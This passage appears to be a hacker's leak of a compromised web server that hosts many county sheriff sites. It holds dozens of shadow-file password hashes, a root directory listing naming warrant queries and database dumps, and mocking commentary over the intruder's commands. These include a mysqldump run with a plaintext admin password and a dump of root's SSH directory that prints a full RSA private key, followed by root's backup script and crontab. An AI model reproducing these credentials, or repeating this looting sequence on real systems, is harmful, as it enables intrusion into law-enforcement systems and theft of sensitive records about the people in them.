  1361. jocsd:$1$NRHv77bV$LA2Xex9kNa46frC/0ArlW1:14600:0:99999:7:::
  1362. scsd:$1$xKBlDTZE$.mpjBbZ0yHHsNcFCmu7pT0:14600:0:99999:7:::
  1363. bjm2:$1$IyEce8if$BFsLo9r.7HgTftQhJHGPh/:14600:0:99999:7:::
  1364. test:$1$/SMm0ODb$EX2C/eZ7Lo3BPfzIlZfBF0:14601:0:99999:7:::
  1365. bcsd_sync:$1$6WexrYqZ$3ROvk9LXiGIAjx/yMFgGc.:14601:0:99999:7:::
  1366. ccsal_synce:!!:14601:0:99999:7:::
  1367. ccsal_sync:$1$1R4G9HKN$0nsQSMPnDwPI8QwcOoB4x0:14601:0:99999:7:::
  1368. kluser:!!:14602:0:99999:7:::
  1369. tigeraccessftp:$1$vIx5yzLJ$QLvytS5blodUB69dx4Ff81:14607:0:99999:7:::
  1370. vbcsd:$1$Xa7IjTjy$EVOg0CDGrhKecE9tcEv0K1:14614:0:99999:7:::
  1371. jonms2:$1$UEKyybmq$V.KCuSAArIbZ97Rb3j.Gj.:14624:0:99999:7:::
  1372. ccsoks:$1$5Um4tVSe$nmmR1DwLGB1rVtilMJUnW.:14629:0:99999:7:::
  1373. crcg:$1$5W78GNCt$5AsiPm0MkUOaxLy7PZUbC.:14637:0:99999:7:::
  1374. tcsoms:$1$AUtRv.T/$8PAgYTEZNTkHAg29MuxxA.:14644:0:99999:7:::
  1375. hcsoks:$1$QNKj.3g8$a5XwX/ucCpz25QC.a7Yyr1:14650:0:99999:7:::
  1376. jcsoks:$1$rLe4qHgu$YVf.K6kRj5bzWE/bYYG2x/:14656:0:99999:7:::
  1377. mosa:$1$dIsYss8M$8wcFZe8f9xyrQg/M5fw2q.:14662:0:99999:7:::
  1378. pcsoks:$1$aOO/b7/y$fksYEq1P0ydvkBDACy7PN1:14678:0:99999:7:::
  1379. johms_sync:$1$JJOQW/Ub$KQcLsIuntNhvuT.IgHfr51:15140:0:99999:7:::
  1380. hcsar:$1$HRrStn03$JID8.6JAq3uO9Ea89sGWy/:14691:0:99999:7:::
  1381. hscar:$1$eT4u9sV5$1yfafNGVFeJLzHKIDnTPB.:14691:0:99999:7:::
  1382. pcsoia:$1$iA.cOgM7$bKcN9Md8bgaqgDOeWMLTk1:14692:0:99999:7:::
  1383. mcsd:$1$w8xq8Wiz$9h9Vmun9mouExbFw5TP9./:14701:0:99999:7:::
  1384. wsoks:$1$RA/aiiIn$vWff63MvT9OM6m/I9g/wI1:14718:0:99999:7:::
  1385. mosa2010bN:!!:14719:0:99999:7:::
  1386. mosa2010:$1$rkKGNbTJ$zuSXZpGmBGZmBLblIR..M0:14720:0:99999:7:::
  1387. faoret:$1$6FeVAWdI$5tdP6hddCUejnapF8SpSr.:14725:0:99999:7:::
  1388. bcso_tiger:$1$LY1S8HSQ$nmrLU.ZovFp/3SyDPqh/G.:14727:0:99999:7:::
  1389. stcsd:$1$pDRSTxFh$ZBvOBAFQ7LnFMjUdsa16g.:14728:0:99999:7:::
  1390. ccsoms:$1$2AcdfJU9$S7c4H4a0ySzzHVv1Xp8vT0:14736:0:99999:7:::
  1391. kcsoms:$1$9/UGCy/Q$v0YU2N4s6fJA1WRrnO4/y1:14743:0:99999:7:::
  1392. pcsoks_sync:$1$ZVgfXBYP$8/7JU659Rzy6AFMTsgUDk1:14753:0:99999:7:::
  1393. mocsd:$1$ruYfFxnn$THY1iwfnln5fIWJEZ.xuI1:14754:0:99999:7:::
  1394. postfix:!!:14768::::::
  1395. bcsoga:$1$um3cyDMU$iyb6m61oqCGNxsBoFTLP2/:14770:0:99999:7:::
  1396. jonms_sync:$1$ox9q2AUv$Z.PKJVfV6wBqkdE27vbNw/:14771:0:99999:7:::
  1397. jcsoks_sync:$1$XkeeIlA/$6H68JaLVbeKNw7YGOOkX31:14790:0:99999:7:::
  1398. cpsola:$1$NwWGtomq$jgAUVRm6VBvGSujRtKwF31:14806:0:99999:7:::
  1399. cgsomo:$1$eilIGZWl$eLznlmIdX3xApkdWmpsnT.:14810:0:99999:7:::
  1400. sfsoar:$1$yOE1lcCf$GUu9M1fczt1Ghc764zw/30:14824:0:99999:7:::
  1401. sfsoar_sync:$1$nxHb55iY$vFvZhr1ruVHu/4U981Jk2.:14826:0:99999:7:::
  1402. code:$1$iqeHXuMI$4vRAcEszoYdstIN3RMgx60:14837:0:99999:7:::
  1403. fcsoga:$1$T2d2gmYb$FFMQvYx7VRTFEtMtYzENj1:14841:0:99999:7:::
  1404. mcsoga:$1$sU6wEv93$dY7TnQIfrf7CNtxrb1BHv0:14852:0:99999:7:::
  1405. code2:$1$j9vWcrHj$ackLsXxNqZYDlHGs9EfTJ/:14853:0:99999:7:::
  1406. kcsoil:$1$RktuLOY5$rqG9aojQ7QPev715Sziym0:14855:0:99999:7:::
  1407. mcsoal:$1$DfHeInc2$tl5Z3EJ5cbpEI7PAi..nR.:14874:0:99999:7:::
  1408. sgsomo:$1$ofmWWjSo$VdSaYP7i5Mq3TaigZKJmY/:14879:0:99999:7:::
  1409. gcsoms:$1$GwuFixxs$ar2pJ.ZaG9F/zahcjl0JP0:14879:0:99999:7:::
  1410. stoms:$1$VRmMMzI7$x1nr.ZMBdSv7VOng/TpX//:14897:0:99999:7:::
  1411. hcsar_sync:$1$k8HSpdqc$5G8/PJOdzeQN8W2VKJj461:14901:0:99999:7:::
  1412. alsa:$1$0D1HLRSq$6mKb1LEmHoM/q2HhpXSjq/:14902:0:99999:7:::
  1413. pcsoar:$1$HxfuMiMY$bAapp8diWD1nSOjkTEqNx/:14917:0:99999:7:::
  1414. rcsd:$1$9poK4hQN$gzorj3zcz7dpG21M45ai5.:14921:0:99999:7:::
  1415. tisoms:$1$wXhmWMjs$EARUykep59RVk3KBNLIay/:14924:0:99999:7:::
  1416. stoms_sync:$1$TEYhWb2S$dYeYk0rb/sqikIaqqovuR/:14945:0:99999:7:::
  1417. prsoar:$1$ZIuKGFWZ$b9QSyf2DPsYbBm/pNe.WP1:14952:0:99999:7:::
  1418. mcsd_sync:$1$b1gA3kVg$Rg3yF/yRG.A/YEM4idaXW1:15001:0:99999:7:::
  1419. jccgms:$1$52kEGL60$J3C2CN/1fq4b.nD1EaNHP1:15009:0:99999:7:::
  1420. ccsook:$1$amm2tffa$XaIWUbOY47Dr02lvTWEFf/:15056:0:99999:7:::
  1421. fcsoar:$1$W74MwMzz$QuYSprTouxtkRx/wKgIJL1:15057:0:99999:7:::
  1422. poalac:$1$q.RuXO6m$C/hJSOR8TUzP5iZvmh3vc1:15085:0:99999:7:::
  1423. arsa:$1$dY5DsE1V$aGJWYgu9pj.kO0gQ14zpd0:15097:0:99999:7:::
  1424. rcpica:$1$CXfW/jiM$PrVYk8La/RySYfT0FeMRI/:15100:0:99999:7:::
  1425. ciga:$1$QTWBjVx9$zs4DkuPeQ7IuyaFtXby3B.:15113:0:99999:7:::
  1426. sfcgar:$1$GqNHP49J$0idVp0wiWtAcd848aWI5O/:15131:0:99999:7:::
  1427. lcsomo:$1$ptPfDVG3$nvwb9D.toLPBP1NsCRbNs1:15132:0:99999:7:::
  1428. tcsoal:$1$0oUtGUJd$dAyePg9xnfh2dNDHRr/s80:15134:0:99999:7:::
  1429. jwiegand:$1$F.H2Vzt/$BzID0ITAA2LtVZ99e5anu.:15135:0:99999:7:::
  1430. bcsf:$1$pznU6Acd$jDjShBfJXAE3YUdsF7W140:15135:0:99999:7:::
  1431. prsoms:$1$NpevRywM$.lnU4tjwBZNx5DyzQ5e8e0:15135:0:99999:7:::
  1432. acsoms:$1$rRiyYAkw$a9FJbLJJZgcWYgdUX5m/B.:15147:0:99999:7:::
  1433. kssa:$1$QJmmY.q8$GKzc4XMppwpKPbPVkI/1H1:15149:0:99999:7:::
  1434.  
  1435. // YOU KNOW WHAT IT IS, ITS A STICKUP
  1436.  
  1437. # ls -al ~root
  1438. total 420776
  1439. drwxr-x--- 17 root root 4096 Jul 22 11:37 .
  1440. drwxr-xr-x 26 root root 4096 Feb 22 22:21 ..
  1441. drwxr-xr-x 2 root root 4096 Nov 30 2010 .autoinstaller
  1442. -rw------- 1 root root 19127 Jul 21 15:58 .bash_history
  1443. -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
  1444. -rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
  1445. -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
  1446. -rw-r--r-- 1 root root 121 Sep 2 2010 .cshrc
  1447. -rw-r--r-- 1 root root 9 Feb 10 10:28 .exrc
  1448. -rw------- 1 root root 686 Jul 20 13:03 .lesshst
  1449. -rw------- 1 root root 1739 Jul 20 10:29 .mysql_history
  1450. -rw-r--r-- 1 root root 91 Dec 23 2009 .pearrc
  1451. -rw------- 1 root root 1024 May 3 09:00 .rnd
  1452. drwx------ 2 root root 4096 Mar 12 2010 .spamassassin
  1453. drwx------ 2 root root 4096 Jan 25 13:27 .ssh
  1454. -rw------- 1 root root 276 Jul 20 10:44 .support_history
  1455. -rw-r--r-- 1 root root 150 Sep 2 2010 .tcshrc
  1456. -rw-r--r-- 1 root root 1143587 Jul 22 11:50 BOCS_warrant_query.sql
  1457. -rw-r--r-- 1 root root 187976 Jul 22 11:45 CRCSD_warrant_query.sql
  1458. -rw-r--r-- 1 root root 3543 Feb 23 09:42 Chicago
  1459. drwxrwxrwx 17 20 games 4096 Dec 30 2009 ImageMagick-6.4.8-3
  1460. -rw-r--r-- 1 root root 11148165 Apr 9 2009 ImageMagick-6.4.8-3.tar.gz
  1461. drwxr-xr-x 2 root root 4096 Jul 14 15:15 MASS_PASS
  1462. -rw-r--r-- 1 root root 94158 Dec 13 2010 MCSOAL.search
  1463. -rw-r--r-- 1 root root 1501473 Jul 22 11:48 SFSOAR_warrant_query.sql
  1464. -rw------- 1 root root 742 Feb 4 2008 anaconda-ks.cfg
  1465. drwxr-xr-x 2 root root 4096 Jun 21 15:31 bin
  1466. drwxr-xr-x 2 root root 4096 May 3 09:53 cert
  1467. -rw-r--r-- 1 root root 1898 May 3 09:09 csr.txt
  1468. drwxr-xr-x 3 root root 4096 Sep 20 2010 downloads
  1469. -rw-r--r-- 1 bocg psacln 0 Jun 21 14:23 huh
  1470. -rw-r--r-- 1 root root 1177 Mar 24 08:50 injection_patch.php
  1471. -rw-r--r-- 1 root root 1182 Mar 24 08:50 injection_patch.php.bak
  1472. -rw-r--r-- 1 root root 13552 Feb 4 2008 install.log
  1473. -rw-r--r-- 1 root root 2540 Feb 4 2008 install.log.syslog
  1474. -rwxrwxrwx 1 mosa psacln 803 Mar 24 2010 log.php
  1475. -rw------- 1 root root 1733 Nov 30 2010 mbox
  1476. -rw-r--r-- 1 root root 93 Aug 23 2010 md5look.php
  1477. -rw-r--r-- 1 root root 36773929 Jul 21 22:04 mysql_backup.sql.gz
  1478. -rw-r--r-- 1 root root 133498898 Jul 1 08:17
  1479. mysql_dump_20110701-081158.sql.gz
  1480. -rw-r--r-- 1 root root 144511936 Jul 8 10:59
  1481. mysql_dump_20110708-104506.sql.gz
  1482. -rw-r--r-- 1 root root 37564532 Jul 15 06:04
  1483. mysql_dump_20110715-060000.sql.gz
  1484. -rw-r--r-- 1 root root 38461089 Jul 22 11:18
  1485. mysql_dump_20110722-111716.sql.gz
  1486. drwxr-xr-x 2 root root 4096 Jun 20 09:46 p7zip
  1487. -rwxrwxrwx 1 mosa psacln 475 Mar 24 2010 parse_geocodes.php
  1488. -rw-r--r-- 1 root root 7164 Jul 5 14:20 perms.log
  1489. drwxr-xr-x 14 1002 1002 4096 Aug 23 2006 php-5.1.6
  1490. -rw-r--r-- 1 root root 8187896 Aug 23 2006 php-5.1.6.tar.gz
  1491. -rw-r--r-- 1 root root 21 Apr 22 10:16 phpinfo.php
  1492. drwxr-xr-x 9 root root 4096 Jul 21 16:24 psa
  1493. drwxrwxr-x 2 510 510 4096 Jun 3 2010 qmhandle-1.3.2
  1494. -rw-r--r-- 1 webdept webdept 15423 Apr 12 2010 qmhandle-1.3.2.tar.gz
  1495. -rw-r--r-- 1 root root 4293 Jun 21 17:48 recaptcha.log
  1496. -rw-r--r-- 1 root root 9751 Jun 21 16:04 recaptchalib.php
  1497. -rw-r--r-- 1 root root 9751 Jun 21 16:04 recaptchalib.php.bak
  1498. -rw-r--r-- 1 root root 9747 Jun 21 15:56 recaptchalib.php.bak.bak
  1499. drwxr-xr-x 3 root root 4096 Dec 21 2009 rootkit_checks
  1500. drwxr-xr-x 2 root root 4096 Jul 20 11:01 scripts
  1501. -rw-r--r-- 1 root root 32 Jun 21 14:54 sete.sh
  1502. -rw-r--r-- 1 root root 355812 Jun 21 14:22 tat E
  1503. drwxr-xr-x 6 root root 4096 Jun 21 15:38 tiny_mce
  1504. -rw-r--r-- 1 root root 2231 Jun 21 11:02 tiny_mce.php
  1505. -rw-r--r-- 1 root root 8957 Jun 21 14:50 tinymce.log
  1506. -rw-r--r-- 1 root root 6101 Jun 21 15:10 tinymce_php.log
  1507. -rw-r--r-- 1 root root 1141875 Jun 29 18:20 warrant_query.sql
  1508. -rw-r--r-- 1 root root 15503360 Jul 22 01:32 z
  1509.  
  1510. // FIRST LETS LOOT THIS MOFO
  1511.  
  1512. # mysqldump -q -u admin -p8w667nHzx%XFXb --all-databases --add-drop-table >
  1513. booty.sql
  1514.  
  1515. // GIMME THE KEYS TO YO HOUSE
  1516.  
  1517. # cat ~root/.ssh/*
  1518. ssh-rsa
  1519. AAAAB3NzaC1yc2EAAAABIwAAAQEA68pUVD3lTeQE5yDAWFOprdg05lmD0eaRznMwDgrAiZhhTEH/
  1520. D0crQDXJN5avBKIf1WdKBIi/AL7jlw4++CAdidYt1ZQ4VEQy3NVyVHqXmI/
  1521. FtE2sCjUlE8ID2u5Mm5X8Xf57ifkXlrSF6HgLwa8P4KxP3HqrZNgb93hRwP/
  1522. VPLkNA7Ef6pkjCMpcOtE0qYynDLswAQhW9abqhiCeWaHHPPTRwjlk0r/vHPwBns777pj5UgU3RkUG9/
  1523. 1X70tKdZJR5Mp961WDGy3sC7Qi0hiM/
  1524. A3tRdo2NKpiZje0oRX3x8WH69vO9ZITeYcxcfu0o9AwiIVHzxJ/DmzFGbRtZ3W/Hw==
  1525. ssh-dss
  1526. AAAAB3NzaC1kc3MAAACBAO/Ikm7ZPgaBYr1OlCnI4h82hB2pEppq24r+VR7/
  1527. MVdKMKmUsQWYvZQG4CPphcXfUEY2sxBbAfSp53eR4AtBYomspYREzF045+
  1528. dgtLj2o7MjDYacAt4KpjuxzglGT2H4hyRhz3fWJSzyubpeeb09nPDNxXOg0l/
  1529. hJgPJWi8XjSj7AAAAFQD9MwyYL/
  1530. DDniuYXNRBcaAAGEXl2wAAAIEAneCU3pUZ44NFoOqQF74GZjbb0XW8r6vVCwCMpoW1F3H5OcDxMSDUOE
  1531. iZTil70hIQBelB8cus3xzn9NBQx/s/47Sb655IRYZDMWU8rwGzTP7U9/
  1532. AiciF0sLrKsyqpbNLlDl79b9wBEkkpO6ELJDPYHK0cVfD0gReeG/vhnQbXYcEAAACBAKrwVdO/
  1533. 7dFdKX9wZzvzA89DLWx1lpIJmbteKzsmIIAoJJgfw7gITb0hKnaRw8v5xQgmC379VRfWC31feB4dORrj
  1534. njKLQLjBiu8jHeL+WqQ/vp/Fg9XhioLDwWHUb5iVrv0VeRbn8Q//
  1535. ltLrbBcqD0dslZ1nRN8i0NCY11B5ubq3 [email protected]
  1536. -----BEGIN RSA PRIVATE KEY-----
  1537. MIIEowIBAAKCAQEAwIP5sXbYS2wsbN8nFPHLzF2qHi/A/eRBcO8CrAtYk8akXpG7
  1538. ROZUdqlD/LnOfjykC+gv8qi8lWrnU9p/p5VjY8Gcv1JWLAfv5+GeA5bFnOpf1ZD7
  1539. gvUdFQXzK5JcFH0V03sJkV1m/oRHQ+V6t7HxTRfiaXLuuT/PCxo4tUuxeaOBJaWd
  1540. 2sLYQaPOb6z27UDafPPg7o7mO0HPCxDSsPW07P0s+xB5QCsk84cFchImi8oZyPwK
  1541. 6ySGvtY0YQRTE1Ixek86d/UM64PY/R5QvXy61FfbnVqlfbD5LbXM+6yLxhxSeHUy
  1542. MGpWkXRMrhroA71e1T68rHZU7qoALHZrdsL8hQIBIwKCAQEAn4NLO0U232hCERCr
  1543. Wn8z1TeqNkTTG4Kcn2bzld2D6Cg/DIdgps15Lx6IyhZMAjI+yAmG0F/stlFDVBtx
  1544. FdOM3aBr7vsUMxyE81SKPXzs4Rn3olOOkRQ8qwTuDijP87gZZhV89Mm7vPFCXNQV
  1545. OR5o2XowoIPNHSY91f/IljdnKkQ05862XywXDqKA4ZURgs2WhCSCGU+bMQ/HcrXx
  1546. whUi5tWgAH9JTd8cVHbTFNHS9nyf3rsqoKsPjUJZot+RpvBzUk75VsKxEm/NpPUz
  1547. foMVR/H0vHl1Y5rv6P0fLzBPUBPBSqM94ELa3niBgsOJsdmzWGUnuZjoYX2Q5RCD
  1548. qa5NHwKBgQDscK4JiSdSh7egaKrFqpDECVR3PtE0gsluxT0am6UmrelZIlILmfFf
  1549. a3J3QHnGzSPuIJit1Px1su5Jt6qwc2R98DRmGgb2n8BHdNQTU1bpmD4K9iwMD8fx
  1550. 5bPNLcC69xKD9TSDS6FaHQRHdLnpwuho3m5mlbGISlVOCtU8/yTnUwKBgQDQcQ/B
  1551. CuHlfB86NIwTTIvTjYUBotk0NqMgHHyLeoZ+mz4kZWKZl7Dp9gC7lA3ljFZh4jIG
  1552. VD8hlmLflVSjY7EFDEjB7GQ3wsEMGXqVVd/jsE4TNnizehxhUh/0pp/bBHZg0OWZ
  1553. Lmak2rJxvt7uI5Bs9g+huy+Q3zi8oz3NW2HJxwKBgQDYLIHc1StEJFAdoYYxEPli
  1554. xrOgOW7Q7Jro7tjH3sLhiQ/cdyZxAca9pBDiDxBAu46QktS8MHHKsjjy8REWWt+J
  1555. FiFHaEDhfB2DKPxpcMR9zQWGXWoZqAdDkC9cgZpEih+Olwtwui0fMHjw37/rquMe
  1556. DTG84KJQuP2JLnnRXk2gSwKBgQDEh9unYggwJJJ4tTOdKuo8fh5R//FdHZJ9XK/x
  1557. OQJ3Xyv2bjhk7hvVRwgBURRqt4Slbt61gqHsd9mQ+oMAc/AMEuWDpF59t6ASuO/r
  1558. 40DPXRZp4ubVG1yWRh4hL2OFW/qVzEYxV6Kbbx1GrKZOPsoAVbb3kzt59wmb6l7X
  1559. kKyoTQKBgEtKR9eP5drKiFtGbanMoe4R01yeoda8GcbHenuW8f4+SIzXS0BRYDMG
  1560. JccKz/XyIk+uxGS+qRDWUS3KFWz8/PUEpLOAEuCv45GpyUVb6XS7O6dn6uVRwEUr
  1561. UYo6Q+HxQ0ZvBOxtG/usuR0ykiV60GuTxjxVXE6urOWSaypWOaUc
  1562. -----END RSA PRIVATE KEY-----
  1563. ssh-rsa
  1564. AAAAB3NzaC1yc2EAAAABIwAAAQEAwIP5sXbYS2wsbN8nFPHLzF2qHi/A/
  1565. eRBcO8CrAtYk8akXpG7ROZUdqlD/LnOfjykC+gv8qi8lWrnU9p/p5VjY8Gcv1JWLAfv5+
  1566. GeA5bFnOpf1ZD7gvUdFQXzK5JcFH0V03sJkV1m/oRHQ+V6t7HxTRfiaXLuuT/
  1567. PCxo4tUuxeaOBJaWd2sLYQaPOb6z27UDafPPg7o7mO0HPCxDSsPW07P0s+
  1568. xB5QCsk84cFchImi8oZyPwK6ySGvtY0YQRTE1Ixek86d/UM64PY/R5QvXy61FfbnVqlfbD5LbXM+
  1569. 6yLxhxSeHUyMGpWkXRMrhroA71e1T68rHZU7qoALHZrdsL8hQ==
  1570. 72.167.49.114 ssh-rsa
  1571. AAAAB3NzaC1yc2EAAAABIwAAAQEAnNcO5j+
  1572. xTWrszbZLZ7pdvvqTumaACzgJNW773NBt8laQEq0HUDfdt3tg5LpaIWQTOBD45jjkyiM2QNJq9CliNfJ
  1573. BnOajtUI90IN2M3xK78ihiHAsp4jdX6kKcpyQrffQ5i8fDllfQmcD/
  1574. 7gndTzo273l8BmhQnvIxOTZwGcQPCnylQ7mxmV/KmRUF5uvo2dAkxSZnmOyDEMZLAAcic/+
  1575. 98cBbxpXu4154ZLG8pXAJ3ASzm7oC4KsC0T2eFt6Um3/BVNMydFc9KiVbyBy4mUda8/
  1576. icvq90TYue3wXWIGwhIPMafSHst6SVAo1m9KLsCA3y1FbHEwK6YzUVi0ZtNmfRw==
  1577. 72.167.49.108 ssh-rsa
  1578. AAAAB3NzaC1yc2EAAAABIwAAAQEA6QYFzjOfwhDhJbKf7tN3CcP2VN5euOPRtuDEtuo8Hm4loFsKsVu/
  1579. Z4AAObT4nhksaowpND8vzfGikitgZibICYLlMcx8JjHFKaaqmbVYocVdm8HpHmYAvII3BJkIZJ9hT7IR
  1580. hp1bc4z/KeUgDVquCR4ak4f4hL9eY0w8Cxc3oM/jYw/bFg+nIBs0dctch3Pw/
  1581. 4pREyBPO8p2BReWI7WlcA1i4NdzhoevE+
  1582. 2qsvMzVWp7HGCIGOQDKgbBL65m2bJrDOZELrvDcBcdrogIpqLO6kSXOnjjVKdcT7zpQuFPR+7wj6t/
  1583. fyMcYPx80XmaDzKbGbNpHSPVsKTJsHqh+NRnqQ==
  1584. ssh-dss
  1585. AAAAB3NzaC1kc3MAAACBAO/Ikm7ZPgaBYr1OlCnI4h82hB2pEppq24r+VR7/
  1586. MVdKMKmUsQWYvZQG4CPphcXfUEY2sxBbAfSp53eR4AtBYomspYREzF045+
  1587. dgtLj2o7MjDYacAt4KpjuxzglGT2H4hyRhz3fWJSzyubpeeb09nPDNxXOg0l/
  1588. hJgPJWi8XjSj7AAAAFQD9MwyYL/
  1589. DDniuYXNRBcaAAGEXl2wAAAIEAneCU3pUZ44NFoOqQF74GZjbb0XW8r6vVCwCMpoW1F3H5OcDxMSDUOE
  1590. iZTil70hIQBelB8cus3xzn9NBQx/s/47Sb655IRYZDMWU8rwGzTP7U9/
  1591. AiciF0sLrKsyqpbNLlDl79b9wBEkkpO6ELJDPYHK0cVfD0gReeG/vhnQbXYcEAAACBAKrwVdO/
  1592. 7dFdKX9wZzvzA89DLWx1lpIJmbteKzsmIIAoJJgfw7gITb0hKnaRw8v5xQgmC379VRfWC31feB4dORrj
  1593. njKLQLjBiu8jHeL+WqQ/vp/Fg9XhioLDwWHUb5iVrv0VeRbn8Q//
  1594. ltLrbBcqD0dslZ1nRN8i0NCY11B5ubq3 [email protected]
  1595.  
  1596.  
  1597. // NOW LETS SEE WHAT YOU WORKING WITH
  1598.  
  1599. # cat ~root/scripts/*
  1600.  
  1601. #!/bin/sh
  1602. datex=$(date +'%Y%m%d-%H%M%S')
  1603. file=mysql_dump_$datex.sql.gz
  1604. echo Backup is $file
  1605. PASSWORD=`cat /etc/psa/.psa.shadow`
  1606.  
  1607. mysqldump -q -u admin -p$PASSWORD --all-databases --add-drop-table | gzip >
  1608. ~/$file
  1609. 0,15,30,45 * * * * /usr/local/psa/admin/sbin/backupmng >/dev/null
  1610. 2>&1
  1611. 0 1 * * 1 /usr/local/psa/libexec/modules/watchdog/cp/secur-check
  1612. 0 1 * * 1 /usr/local/psa/libexec/modules/watchdog/cp/send-report
  1613. weekly
  1614. 10 1 * * * /usr/local/psa/libexec/modules/watchdog/cp/clean-
  1615. sysstats
  1616. 15 1 * * * /usr/local/psa/libexec/modules/watchdog/cp/pack-
  1617. sysstats day
  1618. 15 1 * * 1 /usr/local/psa/libexec/modules/watchdog/cp/pack-
  1619. sysstats week
  1620. 15 1 1 * * /usr/local/psa/libexec/modules/watchdog/cp/pack-
  1621. sysstats month
  1622. 15 1 1 * * /usr/local/psa/libexec/modules/watchdog/cp/pack-
  1623. sysstats year
  1624. 20 1 * * * /usr/local/psa/libexec/modules/watchdog/cp/clean-
  1625. events
  1626. 0 3 * * 7 /usr/local/psa/libexec/modules/watchdog/cp/clean-
  1627. reports
  1628. 0 22 * * * /root/scripts/mySQLbackup.sh | mail -s
  1629. "mySQL Backup" [email protected]
  1630. 50 23 * * * /usr/bin/rsnapshot daily
  1631. 40 23 * * 6 /usr/bin/rsnapshot weekly
  1632. 0 1 * * * /usr/bin/php
  1633. /var/www/vhosts/baxtercountysheriff.com/httpdocs/admin_dymin/modules/most_wanted
  1634. /config/delete_cron.php
  1635. */5 * * * * /usr/bin/php
  1636. /var/www/vhosts/baxtercountysheriff.com/home/parse_xml.php >/dev/null 2>&1
  1637. */5 * * * * /usr/bin/php
  1638. /var/www/vhosts/lawrencecosheriff.com/home/parser.php >/dev/null 2>&1
  1639. #*/5 * * * * /usr/bin/php
  1640. /var/www/vhosts/mostwantedwebsites.net/subdomains/lawmo/httpdocs/home/parser.php
  1641. >/dev/null 2>&1
  1642. */5 * * * * /usr/bin/php
  1643. /var/www/vhosts/cherokeecountyalsheriff.com/home/parser.php >/dev/null 2>&1
  1644. */5 * * * * /usr/bin/php
  1645. /var/www/vhosts/jocomosheriff.org/home/parse_roster.php >>
  1646. /backup/johms_parse_log.txt
  1647. */5 * * * * /usr/bin/php
  1648. /var/www/vhosts/stonecountymosheriff.com/home/parse_roster.php >>
  1649. /backup/stoms_parse_log.txt 2>&1
  1650. */5 * * * * /usr/bin/php
  1651. /var/www/vhosts/crosscountysheriff.org/home/Cross\ County/parse_pcv.php
  1652. >/dev/null 2>&1
  1653. */5 * * * * /usr/bin/php
  1654. /var/www/vhosts/boonesheriff.com/home/parse_pcv.php >/dev/null 2>&1
  1655. */16 * * * * /usr/bin/php
  1656. /var/www/vhosts/crosscountysheriff.org/home/Cross\ County/warrant_parser.php
  1657. >/dev/null 2>&1
  1658. */15 * * * * /usr/bin/php
  1659. /var/www/vhosts/boonesheriff.com/home/warrant_parser.php >/dev/null 2>&1
  1660. */15 * * * * /usr/bin/php
  1661. /var/www/vhosts/tunicamssheriff.com/httpdocs/RPC/test.php >/dev/null 2>&1
  1662. */10 * * * * /usr/bin/php
  1663. /var/www/vhosts/jonesso.com/home/parse.php >> /backup/JONMS_INMATE_ROSTER.log
  1664. 2>&1
  1665. */15 * * * * /usr/bin/php
  1666. /var/www/vhosts/prattcountysheriff.com/home/parse_roster.php >/dev/null 2>&1
  1667. */15 * * * * /usr/bin/php
  1668. /var/www/vhosts/prattcountysheriff.com/home/parse_warrants.php >/dev/null 2>&1
  1669. */15 * * * * /usr/bin/php
  1670. /var/www/vhosts/jeffersoncountykssheriff.com/home/parse_roster.php >>
  1671. /backup/jcsoks_inamte_parse_log.txt
  1672. */5 * * * * /usr/bin/php
  1673. /var/www/vhosts/stfranciscountysheriff.org/home/parse_pcv.php >/dev/null 2>&1
  1674. */5 * * * * /usr/bin/php
  1675. /var/www/vhosts/howardcountysheriffar.com/home/parse_pcv.php >/dev/null 2>&1
  1676. 0 6 * * * /usr/bin/php
  1677. /var/www/vhosts/baxtercountysheriff.com/httpdocs/admin/publish_roster.php
  1678. >/dev/null 2>&1
  1679. 5 6 * * * /usr/bin/php
  1680. /var/www/vhosts/crosscountysheriff.org/httpdocs/admin/modules/inmate_roster/
  1681. publish.php >/dev/null 2>&1
  1682. 10 6 * * * /usr/bin/php
  1683. /var/www/vhosts/cherokeecountyalsheriff.com/httpdocs/admin/modules/inmate_roster
  1684. /publish.php >/dev/null 2>&1
  1685. 15 6 * * * /usr/bin/php
  1686. /var/www/vhosts/lawrencecosheriff.com/httpdocs/admin/modules/inmate_roster/
  1687. publish.php >/dev/null 2>&1
  1688. 20 6 * * * /usr/bin/php
  1689. /var/www/vhosts/tunicamssheriff.com/httpdocs/admin/modules/inmate_roster/publish
  1690. .php >/dev/null 2>&1
  1691. 30 6 * * * /usr/bin/php
  1692. /var/www/vhosts/boonesheriff.com/httpdocs/admin/modules/inmate_roster/publish.
  1693. php >/dev/null 2>&1
  1694. 0 10 * * * /usr/bin/php
  1695. /var/www/vhosts/prattcountysheriff.com/httpdocs/admin/modules/inmate_roster/
  1696. publish.php >/dev/null 2>&1
  1697. 25 6 * * * /usr/bin/php
  1698. /var/www/vhosts/jocomosheriff.org/httpdocs/admin/modules/inmate_roster/publish.
  1699. php >/dev/null 2>&1
  1700. 40 6 * * * /usr/bin/php
  1701. /var/www/vhosts/jeffersoncountykssheriff.com/httpdocs/admin/modules/
  1702. inmate_roster/publish.php >/dev/null 2>&1
  1703. 50 6 * * * /usr/bin/php
  1704. /var/www/vhosts/jonesso.com/httpdocs/admin/modules/inmate_roster/publish.php
  1705. >/dev/null 2>&1
  1706. 50 5 * * * /usr/bin/php
  1707. /var/www/vhosts/stfranciscountysheriff.org/httpdocs/admin/modules/inmate_roster/
  1708. publish.php >/dev/null 2>&1
  1709. 0 2 * * * /usr/bin/php
  1710. /var/www/vhosts/marionsoal.com/httpdocs/admin/modules/inmate_roster/cron/cron.
  1711. php
  1712. 40 1 * * * /usr/bin/find /var/www/vhosts/ -mtime -1
  1713. | /bin/grep -v statistics | /bin/grep -v counter 2>&1 | perl -wple 'BEGIN{print
  1714. "Changed Web Files - New GoDaddy"}'| mail -s "Changed Web Files - GoDaddy" -c
  1715. 0 * * * * /usr/bin/find
  1716. /var/www/vhosts/*/httpdocs/uploads/*.php | grep -v -e
  1717. "watermark_wanted_photo.php" -e "checkimages.php" | mail -s "Go Daddy - Upload
  1718. 0 1 * * * /backup/mail_logs/parse_mail_log.sh
  1719. 1 0 * * * /usr/bin/php
  1720. /var/www/vhosts/grantcountyar.com/httpdocs/cron/purge_events.php
  1721. 1 0 * * * /usr/bin/php
  1722. /var/www/vhosts/crosscountyar.org/httpdocs/cron/purge_events.php
  1723. 1 0 * * * /usr/bin/php
  1724. /var/www/vhosts/izardhometownhealth.com/httpdocs/cron/purge_events.php
  1725. 1 0 * * * /usr/bin/php
